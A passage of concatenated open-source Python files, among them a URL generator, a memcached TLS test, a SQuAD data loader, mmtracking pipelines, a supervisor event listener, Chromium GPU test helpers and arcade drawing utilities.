"+" in engine: return make_execution_engine(tuple(engine.split("+", 1)), cf) return make_execution_engine(engine, cf) def _default_pretty_print( schema: Schema, head_rows: List[List[Any]], title: Any, rows: int, count: int, ): components: List[Any] = [] if title is not None: components.append(HTML(f"<h3>{html.escape(title)}</h3>")) pdf = pd.DataFrame(head_rows, columns=list(schema.names)) components.append(pdf) if count >= 0: components.append(HTML(f"<strong>total count: {count}</strong>")) components.append(HTML(f"<small>schema: {schema}</small>")) display(*components) def _setup_fugue_notebook( ipython: Any, setup_obj: Any, fsql_ignore_case: bool = False ) -> None: s = NotebookSetup() if setup_obj is None else to_instance(setup_obj, NotebookSetup) magics = _FugueSQLMagics( ipython, dict(s.get_pre_conf()), dict(s.get_post_conf()), fsql_ignore_case=fsql_ignore_case, ) ipython.register_magics(magics) s.register_execution_engines() Show.set_hook(s.get_pretty_print())
slybot/slybot/starturls/generator.py
hackrush01/portia
6,390
12748703
<reponame>hackrush01/portia from collections import OrderedDict from datetime import datetime from itertools import chain, product from scrapy.utils.spider import arg_to_iter import six try: from itertools import izip_longest except ImportError: from itertools import zip_longest as izip_longest from six.moves.urllib.parse import urlencode class IdentityGenerator(): def __call__(self, spec): return spec class UrlGenerator(object): def __init__(self, settings=None, spider_args=None): self._processors = { 'date': self._process_date, 'default': self._process_default, 'options': self._process_option, 'range': self._process_range, 'settings': self._process_setting, 'spider_args': self._process_args } self.settings = settings self.spider_args = spider_args def _process_date(self, values): now = datetime.now() return [now.strftime(v) for v in values] def _process_default(self, values): return [str(values[0])] def _process_option(self, values): return [str(v) for v in values] def _process_range(self, values): if len(values) > 3: return [] return six.moves.range(*values) def _process_setting(self, values): if self.settings is None: return [] results = [] for value in values: results.extend(self.settings.getlist(value)) return results def _process_args(self, values): if self.spider_args is None: return [] results = [] for value in values: results.extend(arg_to_iter(self.spider_args.get(value, []))) return results def _build_section(self, descriptor, params=False): if 'type' not in descriptor or 'values' not in descriptor: return [] # Malformed descriptor processor = self._processors.get(descriptor['type']) if processor is None: return [] processed = processor(descriptor['values']) if not params: return processed if 'name' not in descriptor: return [] return izip_longest([], processed, fillvalue=descriptor['name']) def _generate_urls(self, template, paths, params_template, params): path_length = len(paths) if params and not paths: components = product(*params) else: components = product(*chain(paths, params)) for values in components: url = template.format(*values[:path_length]) params = values[path_length:] if params_template or params: url_params = OrderedDict(params_template) for name, value in params: url_params[name] = value url_params = urlencode(url_params) yield '{}?{}'.format(url, url_params) else: yield url def __call__(self, spec): template = spec['template'] param = spec.get('params_template', {}) paths = [self._build_section(d) for d in spec.get('paths', [])] params = [self._build_section(d, True) for d in spec.get('params', [])] url_generator = self._generate_urls(template, paths, param, params) return url_generator generator = UrlGenerator()
test/test_tls.py
alexmv/python-binary-memcached
103
12748707
import os import pytest import subprocess import ssl import time import trustme import bmemcached import test_simple_functions ca = trustme.CA() server_cert = ca.issue_cert(os.environ["MEMCACHED_HOST"] + u"") @pytest.yield_fixture(scope="module", autouse=True) def memcached_tls(): key = server_cert.private_key_pem cert = server_cert.cert_chain_pems[0] with cert.tempfile() as c, key.tempfile() as k: p = subprocess.Popen( [ "memcached", "-p5001", "-Z", "-o", "ssl_key={}".format(k), "-o", "ssl_chain_cert={}".format(c), "-o", "ssl_verify_mode=1", ], stdout=subprocess.PIPE, stderr=subprocess.PIPE, ) time.sleep(0.1) if p.poll() is not None: pytest.skip("Memcached server is not built with TLS support.") yield p p.kill() p.wait() class TLSMemcachedTests(test_simple_functions.MemcachedTests): """ Same tests as above, just make sure it works with TLS. """ def setUp(self): ctx = ssl.create_default_context() ca.configure_trust(ctx) self.server = "{}:5001".format(os.environ["MEMCACHED_HOST"]) self.client = bmemcached.Client(self.server, tls_context=ctx) self.reset()
dataset/squad_dataset.py
jamaalhay/Final_Proj
104
12748718
#!/usr/bin/env python # -*- coding: utf-8 -*- __author__ = 'han' import os import h5py import math import torch import torch.utils.data from torch.utils.data.sampler import Sampler, SequentialSampler import logging import pandas as pd from dataset.preprocess_data import PreprocessData from utils.functions import * logger = logging.getLogger(__name__) class SquadDataset: """ dataset module for SQuAD """ def __init__(self, global_config): self._data = {} self._attr = {} self.meta_data = {} self.global_config = global_config # whether preprocessing squad dataset is_exist_dataset_h5 = os.path.exists(self.global_config['data']['dataset_h5']) assert is_exist_dataset_h5, 'not found dataset hdf5 file in %s' % self.global_config['data']['dataset_h5'] self._load_hdf5() def _load_hdf5(self): """ load squad hdf5 file :return: """ squad_h5_path = self.global_config['data']['dataset_h5'] with h5py.File(squad_h5_path, 'r') as f: f_data = f['data'] for name in ['train', 'dev']: self._data[name] = {} for sub_name in ['answer_range', 'samples_id']: self._data[name][sub_name] = np.array(f_data[name][sub_name]) for sub_name in ['context', 'question']: cur_data = f_data[name][sub_name] self._data[name][sub_name] = {} # 'token', 'pos', 'ent', 'em', 'em_lemma', 'right_space' for subsub_name in cur_data.keys(): self._data[name][sub_name][subsub_name] = np.array(cur_data[subsub_name]) for key, value in f.attrs.items(): self._attr[key] = value # 'id2word', 'id2char', 'id2pos', 'id2ent' for key in f['meta_data'].keys(): self.meta_data[key] = np.array(f['meta_data'][key]) self._char2id = dict(zip(self.meta_data['id2char'], range(len(self.meta_data['id2char'])))) def get_dataloader_train(self, batch_size, num_workers): """ a train data dataloader :param batch_size: :return: """ return self.get_dataloader(batch_size, 'train', num_workers, shuffle=True) def get_dataloader_dev(self, batch_size, num_workers): """ a dev data dataloader :param batch_size: :return: """ return self.get_dataloader(batch_size, 'dev', num_workers, shuffle=False) def get_dataloader(self, batch_size, type, num_workers, shuffle): """ get dataloader on train or dev dataset :param batch_size: :param type: 'train' or 'dev' :return: """ data = self._data[type] dataset = CQA_Dataset(data['context'], data['question'], data['answer_range'], self.meta_data, self.global_config['preprocess']) if shuffle: sampler = SortedBatchSampler(dataset.get_lengths(), batch_size) else: sampler = SequentialSampler(dataset) dataloader = torch.utils.data.DataLoader(dataset, batch_size=batch_size, sampler=sampler, collate_fn=self.collect_fun, num_workers=num_workers) return dataloader def collect_fun(self, batch): """ collect function for DataLoader, will generate char idx currently :param batch: :return: """ context = [] context_f = [] question = [] question_f = [] answer_range = [] for ele in batch: context.append(ele[0]) question.append(ele[1]) context_f.append(ele[2]) question_f.append(ele[3]) answer_range.append(ele[4]) # word idx bat_context, max_ct_len = del_zeros_right(torch.stack(context, dim=0)) bat_question, max_qt_len = del_zeros_right(torch.stack(question, dim=0)) bat_answer, _ = del_zeros_right(torch.stack(answer_range, dim=0)) # additional features bat_context_f = None bat_question_f = None if context_f[0] is not None: bat_context_f = torch.stack(context_f, dim=0)[:, 0:max_ct_len, :] bat_question_f = torch.stack(question_f, dim=0)[:, 0:max_qt_len, :] # generate char idx bat_context_char = None bat_question_char = None if self.global_config['preprocess']['use_char']: bat_context_char = self._batch_word_to_char(bat_context) bat_question_char = self._batch_word_to_char(bat_question) return bat_context, bat_question, bat_context_char, bat_question_char, bat_context_f, bat_question_f, bat_answer def get_batch_train(self, batch_size): """ a train data batch .. warning:: This method is now deprecated in favor of :func:`get_dataloader_train`. """ return self.get_batch_data(batch_size, 'train') def get_batch_dev(self, batch_size): """ development data batch .. warning:: This method is now deprecated in favor of :func:`get_dataloader_dev`. """ return self.get_batch_data(batch_size, 'dev') def get_batch_data(self, batch_size, type): """ same with BatchSampler .. warning:: This method is now deprecated in favor of :func:`BatchSampler` and `get_dataloader`. """ data = self._data[type] data_size = len(data['context']) i = 0 while i < data_size: j = min(i + batch_size, data_size) bat = [data['context'][i:j], data['question'][i:j], data['answer_range'][i:j]] bat_tensor = [to_long_tensor(x) for x in bat] i = j yield bat_tensor def get_all_samples_id_train(self): return self.get_all_samples_id('train') def get_all_samples_id_dev(self): return self.get_all_samples_id('dev') def get_all_samples_id(self, type): """ get samples id of 'train' or 'dev' data :param type: :return: """ data = self._data[type] return data['samples_id'] def get_all_ct_right_space_train(self): return self.get_all_ct_right_space('train') def get_all_ct_right_space_dev(self): return self.get_all_ct_right_space('dev') def get_all_ct_right_space(self, type): data = self._data[type] return data['context']['right_space'] def get_train_batch_cnt(self, batch_size): """ get count of train batches :param batch_size: single batch size :return: count """ data_size = self._attr['train_size'] cnt_batch = math.ceil(data_size * 1.0 / batch_size) return cnt_batch def get_dev_batch_cnt(self, batch_size): """ get count of dev batches :param batch_size: single batch size :return: count """ data_size = self._attr['dev_size'] cnt_batch = math.ceil(data_size * 1.0 / batch_size) return cnt_batch def _batch_word_to_char(self, batch_wordid): """ transform batch with sentence of wordid to batch data with sentence of char id :param batch_wordid: (batch, seq_len), torch tensor :return: (batch, seq_len, word_len), torch tensor """ batch_wordid = batch_wordid.numpy() batch_word = [self.sentence_id2word(x) for x in batch_wordid] batch_length = [[len(x) if x != PreprocessData.padding else 0 for x in s] for s in batch_word] batch_max_len = np.max(batch_length) batch_char = list(map(lambda x: self.sentence_char2id(x, max_len=batch_max_len), batch_word)) batch_char = np.stack(batch_char, axis=0) return to_long_tensor(batch_char) def gen_batch_with_char(self, batch_data, enable_char, device): """ word batch to generate char barch, also move to device, used in train or valid steps .. warning:: This method is now deprecated in favor of collect function in DataLoader """ batch_data = [del_zeros_right(x)[0] for x in batch_data] if not enable_char: bat_context, bat_question, bat_answer_range = [x.to(device) for x in batch_data] bat_context_char = None bat_question_char = None else: bat_context, bat_question, bat_answer_range = batch_data bat_context_char = self._batch_word_to_char(bat_context) bat_question_char = self._batch_word_to_char(bat_question) bat_context, bat_question, bat_context_char, bat_question_char, bat_answer_range = [x.to(device) for x in [bat_context, bat_question, bat_context_char, bat_question_char, bat_answer_range]] return bat_context, bat_question, bat_context_char, bat_question_char, bat_answer_range def sentence_id2word(self, s_id): """ transform a sentence with word id to a sentence with real word :param s_id: :return: """ s = map(lambda id: self.meta_data['id2word'][id], s_id) return list(s) def sentence_word2id(self, s): """ transform a sentence with word to a sentence with word id (Note that it's a slow version when using np.where) :param s: :return: """ s_id = map(lambda word: np.where(self.meta_data['id2word'] == word)[0][0], s) return np.array(list(s_id)) def word_id2char(self, w_id): w = map(lambda id: self.meta_data['id2char'][id], w_id) return list(w) def word_char2id(self, w): if w == PreprocessData.padding: # not actual word return np.ones(1, ) # make sure word length>0 and right encoding, here any none-zero value not effect w_id = map(lambda ch: self._char2id[ch], w) return np.array(list(w_id)) def sentence_char2id(self, s, max_len=None): s_cid = list(map(lambda w: self.word_char2id(w), s)) if max_len is None: word_len = list(map(lambda x: len(x), s_cid)) max_len = np.max(word_len) s_cid_pad = map(lambda x: np.pad(x, (0, max_len - len(x)), 'constant', constant_values=(0, 0)), s_cid) return np.stack(list(s_cid_pad), axis=0) def gather_context_seq_len(self, type, steps=None): """ gather the context sequence counts with different lengths :param type: 'train' or 'dev' data :param steps: set to None means default steps :return: """ data = self._data[type] context = to_long_tensor(data['context']['token']) mask = compute_mask(context) lengths = mask.eq(1).long().sum(1).squeeze() length_pd = pd.DataFrame(data=lengths.numpy(), columns=['length']) if steps is None: steps = [0, 100, 200, 300, 400, 500, 600, 700, 800] assert len(steps) > 0 # get step length cnt real_step = [] step_length_cnt = [] for i in range(1, len(steps)): lower_bound = steps[i - 1] upper_bound = steps[i] assert lower_bound < upper_bound # [lower_bound, upper_bound) real_step.append((lower_bound, upper_bound)) valid = length_pd[(length_pd['length'] < upper_bound) & (length_pd['length'] >= lower_bound)] tmp_cnt = valid.shape[0] step_length_cnt.append(tmp_cnt) rtn_step_length = list(zip(real_step, step_length_cnt)) # get all length cnt length_cnt = length_pd['length'].value_counts().to_frame(name='cnt') length_cnt['length'] = length_cnt.index return rtn_step_length, length_cnt def gather_answer_seq_len(self, type, max_len=None): """ gather the answer sequence counts with different lengths :param type: 'train' or 'dev' data :param max_len: :return: """ data = self._data[type] answer_range = data['answer_range'] lengths = [] for i in range(answer_range.shape[0]): tmp_lens = [] for j in range(int(answer_range.shape[1] / 2)): if answer_range[i, j * 2] != -1: tmp_lens.append(answer_range[i, j * 2 + 1] - answer_range[i, j * 2] + 1) lengths.append(min(tmp_lens)) length_pd = pd.DataFrame(data=lengths, columns=['length']) # get all length cnt length_cnt = length_pd['length'].value_counts().to_frame(name='cnt') length_cnt['length'] = length_cnt.index length_cnt = length_cnt.sort_index() if max_len is not None: sum_len = length_cnt[length_cnt['length'] >= max_len]['cnt'].sum() length_cnt = length_cnt[length_cnt['length'] < max_len] length_cnt.loc[max_len] = [sum_len, '>=%d' % max_len] return length_cnt class CQA_Dataset(torch.utils.data.Dataset): """ squad like dataset, used for dataloader Args: - context: (batch, ct_len) - question: (batch, qt_len) - answer_range: (batch, ans_len) """ def __init__(self, context, question, answer_range, feature_dict, config): self.context = context self.question = question self.answer_range = answer_range self.feature_dict = feature_dict self.config = config self.lengths = self.get_lengths() def __getitem__(self, index): cur_context = to_long_tensor(self.context['token'][index]) cur_question = to_long_tensor(self.question['token'][index]) cur_answer = to_long_tensor(self.answer_range[index]) cur_context_f, cur_question_f = self.addition_feature(index) return cur_context, cur_question, cur_context_f, cur_question_f, cur_answer def __len__(self): return self.answer_range.shape[0] def get_lengths(self): ct_mask = self.context['token'].__ne__(PreprocessData.padding_idx) ct_lengths = ct_mask.sum(1) qt_mask = self.question['token'].__ne__(PreprocessData.padding_idx) qt_lengths = qt_mask.sum(1) lengths = np.stack([ct_lengths, qt_lengths]) return lengths def addition_feature(self, index): data = [self.context, self.question] add_features = [None, None] for k in range(len(data)): features = {} tmp_seq_len = data[k]['token'].shape[1] if self.config['use_pos']: features['pos'] = torch.zeros((tmp_seq_len, len(self.feature_dict['id2pos'])), dtype=torch.float) for i, ele in enumerate(data[k]['pos'][index]): if ele == PreprocessData.padding_idx: break features['pos'][i, ele] = 1 if self.config['use_ent']: features['ent'] = torch.zeros((tmp_seq_len, len(self.feature_dict['id2ent'])), dtype=torch.float) for i, ele in enumerate(data[k]['ent'][index]): if ele == PreprocessData.padding_idx: break features['ent'][i, ele] = 1 if self.config['use_em']: features['em'] = to_float_tensor(data[k]['em'][index]).unsqueeze(-1) if self.config['use_em_lemma']: features['em_lemma'] = to_float_tensor(data[k]['em_lemma'][index]).unsqueeze(-1) if len(features) > 0: add_features[k] = torch.cat(list(features.values()), dim=-1) return add_features class SortedBatchSampler(Sampler): """ forked from https://github.com/HKUST-KnowComp/MnemonicReader """ def __init__(self, lengths, batch_size, shuffle=True): self.lengths = lengths # (2, data_num) self.batch_size = batch_size self.shuffle = shuffle def __iter__(self): lengths = np.array( [(-l[0], -l[1], np.random.random()) for l in self.lengths.T], dtype=[('l1', np.int_), ('l2', np.int_), ('rand', np.float_)] ) indices = np.argsort(lengths, order=('l1', 'l2', 'rand')) batches = [indices[i:i + self.batch_size] for i in range(0, len(indices), self.batch_size)] last = batches[-1] # last batch may not be full batch size if self.shuffle: batches = batches[:len(batches)-1] np.random.shuffle(batches) batches.append(last) return iter([i for batch in batches for i in batch]) def __len__(self): return self.lengths.shape[1]
38-neuro-monolithic/tf-38-learning.py
cyyeh/exercises-in-programming-style
1,821
12748783
<gh_stars>1000+ from keras.models import Sequential from keras.layers import Dense from keras.losses import binary_crossentropy, categorical_crossentropy from keras.optimizers import SGD from keras. metrics import top_k_categorical_accuracy from keras import backend as K import numpy as np import sys, os, string, random characters = string.printable char_indices = dict((c, i) for i, c in enumerate(characters)) indices_char = dict((i, c) for i, c in enumerate(characters)) INPUT_VOCAB_SIZE = len(characters) LINE_SIZE = 80 BATCH_SIZE = 200 STEPS_PER_EPOCH = 5000 EPOCHS = 4 def encode_one_hot(line): x = np.zeros((1, LINE_SIZE, INPUT_VOCAB_SIZE)) sp_idx = char_indices[' '] for i, c in enumerate(line): index = char_indices[c] if c in characters else sp_idx x[0][i][index] = 1 # Pad with spaces for i in range(len(line), LINE_SIZE): x[0][i][sp_idx] = 1 return x.reshape([1, LINE_SIZE*INPUT_VOCAB_SIZE]) def decode_one_hot(y): s = [] x = y.reshape([1, LINE_SIZE, INPUT_VOCAB_SIZE]) for onehot in x[0]: one_index = np.argmax(onehot) s.append(indices_char[one_index]) return ''.join(s) def input_generator(nsamples): def generate_line(): inline = []; outline = [] for _ in range(LINE_SIZE): c = random.choice(characters) expected = c.lower() if c in string.ascii_letters else ' ' inline.append(c); outline.append(expected) for i in range(LINE_SIZE): if outline[i] == ' ': continue if i > 0 and i < LINE_SIZE - 1: outline[i] = ' ' if outline[i-1] == ' ' and outline[i+1] == ' ' else outline[i] if (i == 0 and outline[i+1] == ' ') or (i == LINE_SIZE-1 and outline[i-1] == ' '): outline[i] = ' ' return ''.join(inline), ''.join(outline) while True: data_in = np.zeros((nsamples, LINE_SIZE * INPUT_VOCAB_SIZE)) data_out = np.zeros((nsamples, LINE_SIZE * INPUT_VOCAB_SIZE)) for i in range(nsamples): input_data, expected = generate_line() data_in[i] = encode_one_hot(input_data)[0] data_out[i] = encode_one_hot(expected)[0] yield data_in, data_out def train(model): model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy']) input_gen = input_generator(BATCH_SIZE) validation_gen = input_generator(BATCH_SIZE) model.fit_generator(input_gen, epochs = EPOCHS, workers=1, steps_per_epoch = STEPS_PER_EPOCH, validation_data = validation_gen, validation_steps = 10) def build_model(): # Normalize characters using a dense layer model = Sequential() model.add(Dense(LINE_SIZE*INPUT_VOCAB_SIZE, input_shape=(LINE_SIZE*INPUT_VOCAB_SIZE,), activation='sigmoid')) return model def build_deep_model(): # Normalize characters using a dense layer model = Sequential() model.add(Dense(80, input_shape=(LINE_SIZE*INPUT_VOCAB_SIZE,), activation='sigmoid')) model.add(Dense(800, activation='sigmoid')) model.add(Dense(LINE_SIZE*INPUT_VOCAB_SIZE, activation='sigmoid')) return model model = build_deep_model() model.summary() train(model) input("Network has been trained. Press <Enter> to run program.") with open(sys.argv[1]) as f: for line in f: if line.isspace(): continue batch = encode_one_hot(line) preds = model.predict(batch) normal = decode_one_hot(preds) print(normal)
mmtrack/datasets/pipelines/loading.py
BigBen0519/mmtracking
2,226
12748787
<filename>mmtrack/datasets/pipelines/loading.py # Copyright (c) OpenMMLab. All rights reserved. from mmdet.datasets.builder import PIPELINES from mmdet.datasets.pipelines import LoadAnnotations, LoadImageFromFile from mmtrack.core import results2outs @PIPELINES.register_module() class LoadMultiImagesFromFile(LoadImageFromFile): """Load multi images from file. Please refer to `mmdet.datasets.pipelines.loading.py:LoadImageFromFile` for detailed docstring. """ def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) def __call__(self, results): """Call function. For each dict in `results`, call the call function of `LoadImageFromFile` to load image. Args: results (list[dict]): List of dict from :obj:`mmtrack.CocoVideoDataset`. Returns: list[dict]: List of dict that contains loaded image. """ outs = [] for _results in results: _results = super().__call__(_results) outs.append(_results) return outs @PIPELINES.register_module() class SeqLoadAnnotations(LoadAnnotations): """Sequence load annotations. Please refer to `mmdet.datasets.pipelines.loading.py:LoadAnnotations` for detailed docstring. Args: with_track (bool): If True, load instance ids of bboxes. """ def __init__(self, with_track=False, *args, **kwargs): super().__init__(*args, **kwargs) self.with_track = with_track def _load_track(self, results): """Private function to load label annotations. Args: results (dict): Result dict from :obj:`mmtrack.CocoVideoDataset`. Returns: dict: The dict contains loaded label annotations. """ results['gt_instance_ids'] = results['ann_info']['instance_ids'].copy() return results def __call__(self, results): """Call function. For each dict in results, call the call function of `LoadAnnotations` to load annotation. Args: results (list[dict]): List of dict that from :obj:`mmtrack.CocoVideoDataset`. Returns: list[dict]: List of dict that contains loaded annotations, such as bounding boxes, labels, instance ids, masks and semantic segmentation annotations. """ outs = [] for _results in results: _results = super().__call__(_results) if self.with_track: _results = self._load_track(_results) outs.append(_results) return outs @PIPELINES.register_module() class LoadDetections(object): """Load public detections from MOT benchmark. Args: results (dict): Result dict from :obj:`mmtrack.CocoVideoDataset`. """ def __call__(self, results): outs_det = results2outs(bbox_results=results['detections']) bboxes = outs_det['bboxes'] labels = outs_det['labels'] results['public_bboxes'] = bboxes[:, :4] if bboxes.shape[1] > 4: results['public_scores'] = bboxes[:, -1] results['public_labels'] = labels results['bbox_fields'].append('public_bboxes') return results
Creational/Factory-Method/python/FactoryMethod.py
Hkataya/design-patterns
294
12748796
<reponame>Hkataya/design-patterns<filename>Creational/Factory-Method/python/FactoryMethod.py from abc import ABC, abstractmethod class Creator(ABC): def some_operation(self): product = self.create_product() product.do_stuff() @abstractmethod def create_product(self): pass class Product(ABC): @abstractmethod def do_stuff(self): pass class ConcreteProductAlpha(Product): def do_stuff(self): print("Stuff of product Alpha") class ConcreteCreatorAlpha(Creator): def create_product(self): return ConcreteProductAlpha() class ConcreteProductBeta(Product): def do_stuff(self): print("Stuff of product Beta") class ConcreteCreatorBeta(Creator): def create_product(self): return ConcreteProductBeta() def main(): creatorAlpha = ConcreteCreatorAlpha() creatorAlpha.some_operation() creatorBeta = ConcreteCreatorBeta() creatorBeta.some_operation() if __name__ == "__main__": main()
supervisor/scripts/sample_exiting_eventlistener.py
LexMachinaInc/supervisor
365
12748826
<filename>supervisor/scripts/sample_exiting_eventlistener.py #!/usr/bin/env python # A sample long-running supervisor event listener which demonstrates # how to accept event notifications from supervisor and how to respond # properly. It is the same as the sample_eventlistener.py script # except it exits after each request (presumably to be restarted by # supervisor). This demonstration does *not* use the # supervisor.childutils module, which wraps the specifics of # communications in higher-level API functions. If your listeners are # implemented using Python, it is recommended that you use the # childutils module API instead of modeling your scripts on the # lower-level protocol example below. import sys def write_stdout(s): sys.stdout.write(s) sys.stdout.flush() def write_stderr(s): sys.stderr.write(s) sys.stderr.flush() def main(): write_stdout('READY\n') # transition from ACKNOWLEDGED to READY line = sys.stdin.readline() # read a line from stdin from supervisord write_stderr(line) # print it out to stderr (testing only) headers = dict([ x.split(':') for x in line.split() ]) data = sys.stdin.read(int(headers['len'])) # read the event payload write_stderr(data) # print the event payload to stderr (testing only) write_stdout('RESULT 2\nOK') # transition from READY to ACKNOWLEDGED # exit, if the eventlistener process config has autorestart=true, # it will be restarted by supervisord. if __name__ == '__main__': main()
content/test/gpu/gpu_tests/cloud_storage_test_base.py
iplo/Chain
231
12748831
<gh_stars>100-1000 # Copyright 2013 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Base classes for a test and validator which upload results (reference images, error images) to cloud storage.""" import os import re import tempfile from telemetry import test from telemetry.core import bitmap from telemetry.page import cloud_storage from telemetry.page import page_test test_data_dir = os.path.abspath(os.path.join( os.path.dirname(__file__), '..', '..', 'data', 'gpu')) default_generated_data_dir = os.path.join(test_data_dir, 'generated') error_image_cloud_storage_bucket = 'chromium-browser-gpu-tests' class ValidatorBase(page_test.PageTest): def __init__(self, test_method_name): super(ValidatorBase, self).__init__(test_method_name) # Parameters for cloud storage reference images. self.vendor_id = None self.device_id = None self.vendor_string = None self.device_string = None self.msaa = False ### ### Routines working with the local disk (only used for local ### testing without a cloud storage account -- the bots do not use ### this code path). ### def _UrlToImageName(self, url): image_name = re.sub(r'^(http|https|file)://(/*)', '', url) image_name = re.sub(r'\.\./', '', image_name) image_name = re.sub(r'(\.|/|-)', '_', image_name) return image_name def _WriteImage(self, image_path, png_image): output_dir = os.path.dirname(image_path) if not os.path.exists(output_dir): os.makedirs(output_dir) png_image.WritePngFile(image_path) def _WriteErrorImages(self, img_dir, img_name, screenshot, ref_png): full_image_name = img_name + '_' + str(self.options.build_revision) full_image_name = full_image_name + '.png' # Always write the failing image. self._WriteImage( os.path.join(img_dir, 'FAIL_' + full_image_name), screenshot) if ref_png: # Save the reference image. # This ensures that we get the right revision number. self._WriteImage( os.path.join(img_dir, full_image_name), ref_png) # Save the difference image. diff_png = screenshot.Diff(ref_png) self._WriteImage( os.path.join(img_dir, 'DIFF_' + full_image_name), diff_png) ### ### Cloud storage code path -- the bots use this. ### def _ComputeGpuInfo(self, tab): if ((self.vendor_id and self.device_id) or (self.vendor_string and self.device_string)): return browser = tab.browser if not browser.supports_system_info: raise Exception('System info must be supported by the browser') system_info = browser.GetSystemInfo() if not system_info.gpu: raise Exception('GPU information was absent') device = system_info.gpu.devices[0] if device.vendor_id and device.device_id: self.vendor_id = device.vendor_id self.device_id = device.device_id elif device.vendor_string and device.device_string: self.vendor_string = device.vendor_string self.device_string = device.device_string else: raise Exception('GPU device information was incomplete') self.msaa = not ( 'disable_multisampling' in system_info.gpu.driver_bug_workarounds) def _FormatGpuInfo(self, tab): self._ComputeGpuInfo(tab) msaa_string = '_msaa' if self.msaa else '_non_msaa' if self.vendor_id: return '%s_%04x_%04x%s' % ( self.options.os_type, self.vendor_id, self.device_id, msaa_string) else: return '%s_%s_%s%s' % ( self.options.os_type, self.vendor_string, self.device_string, msaa_string) def _FormatReferenceImageName(self, img_name, page, tab): return '%s_v%s_%s.png' % ( img_name, page.revision, self._FormatGpuInfo(tab)) def _UploadBitmapToCloudStorage(self, bucket, name, bitmap, public=False): # This sequence of steps works on all platforms to write a temporary # PNG to disk, following the pattern in bitmap_unittest.py. The key to # avoiding PermissionErrors seems to be to not actually try to write to # the temporary file object, but to re-open its name for all operations. temp_file = tempfile.NamedTemporaryFile().name bitmap.WritePngFile(temp_file) cloud_storage.Insert(bucket, name, temp_file, publicly_readable=public) def _ConditionallyUploadToCloudStorage(self, img_name, page, tab, screenshot): """Uploads the screenshot to cloud storage as the reference image for this test, unless it already exists. Returns True if the upload was actually performed.""" if not self.options.refimg_cloud_storage_bucket: raise Exception('--refimg-cloud-storage-bucket argument is required') cloud_name = self._FormatReferenceImageName(img_name, page, tab) if not cloud_storage.Exists(self.options.refimg_cloud_storage_bucket, cloud_name): self._UploadBitmapToCloudStorage(self.options.refimg_cloud_storage_bucket, cloud_name, screenshot) return True return False def _DownloadFromCloudStorage(self, img_name, page, tab): """Downloads the reference image for the given test from cloud storage, returning it as a Telemetry Bitmap object.""" # TODO(kbr): there's a race condition between the deletion of the # temporary file and gsutil's overwriting it. if not self.options.refimg_cloud_storage_bucket: raise Exception('--refimg-cloud-storage-bucket argument is required') temp_file = tempfile.NamedTemporaryFile().name cloud_storage.Get(self.options.refimg_cloud_storage_bucket, self._FormatReferenceImageName(img_name, page, tab), temp_file) return bitmap.Bitmap.FromPngFile(temp_file) def _UploadErrorImagesToCloudStorage(self, image_name, screenshot, ref_img): """For a failing run, uploads the failing image, reference image (if supplied), and diff image (if reference image was supplied) to cloud storage. This subsumes the functionality of the archive_gpu_pixel_test_results.py script.""" machine_name = re.sub('\W+', '_', self.options.test_machine_name) upload_dir = '%s_%s_telemetry' % (self.options.build_revision, machine_name) base_bucket = '%s/runs/%s' % (error_image_cloud_storage_bucket, upload_dir) image_name_with_revision = '%s_%s.png' % ( image_name, self.options.build_revision) self._UploadBitmapToCloudStorage( base_bucket + '/gen', image_name_with_revision, screenshot, public=True) if ref_img: self._UploadBitmapToCloudStorage( base_bucket + '/ref', image_name_with_revision, ref_img, public=True) diff_img = screenshot.Diff(ref_img) self._UploadBitmapToCloudStorage( base_bucket + '/diff', image_name_with_revision, diff_img, public=True) print ('See http://%s.commondatastorage.googleapis.com/' 'view_test_results.html?%s for this run\'s test results') % ( error_image_cloud_storage_bucket, upload_dir) class TestBase(test.Test): @staticmethod def _AddTestCommandLineOptions(parser, option_group): option_group.add_option('--build-revision', help='Chrome revision being tested.', default="unknownrev") option_group.add_option('--upload-refimg-to-cloud-storage', dest='upload_refimg_to_cloud_storage', action='store_true', default=False, help='Upload resulting images to cloud storage as reference images') option_group.add_option('--download-refimg-from-cloud-storage', dest='download_refimg_from_cloud_storage', action='store_true', default=False, help='Download reference images from cloud storage') option_group.add_option('--refimg-cloud-storage-bucket', help='Name of the cloud storage bucket to use for reference images; ' 'required with --upload-refimg-to-cloud-storage and ' '--download-refimg-from-cloud-storage. Example: ' '"chromium-gpu-archive/reference-images"') option_group.add_option('--os-type', help='Type of operating system on which the pixel test is being run, ' 'used only to distinguish different operating systems with the same ' 'graphics card. Any value is acceptable, but canonical values are ' '"win", "mac", and "linux", and probably, eventually, "chromeos" ' 'and "android").', default='') option_group.add_option('--test-machine-name', help='Name of the test machine. Specifying this argument causes this ' 'script to upload failure images and diffs to cloud storage directly, ' 'instead of relying on the archive_gpu_pixel_test_results.py script.', default='') option_group.add_option('--generated-dir', help='Overrides the default on-disk location for generated test images ' '(only used for local testing without a cloud storage account)', default=default_generated_data_dir)
arcade/drawing_support.py
janscas/arcade
824
12748848
<reponame>janscas/arcade<filename>arcade/drawing_support.py """ Functions used to support drawing. No Pyglet/OpenGL here. """ import math from typing import Tuple, Union, cast from arcade import Color from arcade import RGBA, RGB def get_points_for_thick_line(start_x: float, start_y: float, end_x: float, end_y: float, line_width: float): """ Function used internally for Arcade. OpenGL draws triangles only, so a think line must be two triangles that make up a rectangle. This calculates those points. """ vector_x = start_x - end_x vector_y = start_y - end_y perpendicular_x = vector_y perpendicular_y = -vector_x length = math.sqrt(vector_x * vector_x + vector_y * vector_y) if length == 0: normal_x = 1.0 normal_y = 1.0 else: normal_x = perpendicular_x / length normal_y = perpendicular_y / length r1_x = start_x + normal_x * line_width / 2 r1_y = start_y + normal_y * line_width / 2 r2_x = start_x - normal_x * line_width / 2 r2_y = start_y - normal_y * line_width / 2 r3_x = end_x + normal_x * line_width / 2 r3_y = end_y + normal_y * line_width / 2 r4_x = end_x - normal_x * line_width / 2 r4_y = end_y - normal_y * line_width / 2 points = (r1_x, r1_y), (r2_x, r2_y), (r4_x, r4_y), (r3_x, r3_y) return points def get_four_byte_color(color: Color) -> RGBA: """ Given a RGB list, it will return RGBA. Given a RGBA list, it will return the same RGBA. :param Color color: Three or four byte tuple :returns: return: Four byte RGBA tuple """ if len(color) == 4: return cast(RGBA, color) elif len(color) == 3: return color[0], color[1], color[2], 255 else: raise ValueError("This isn't a 3 or 4 byte color") def get_four_float_color(color: Color) -> Tuple[float, float, float, 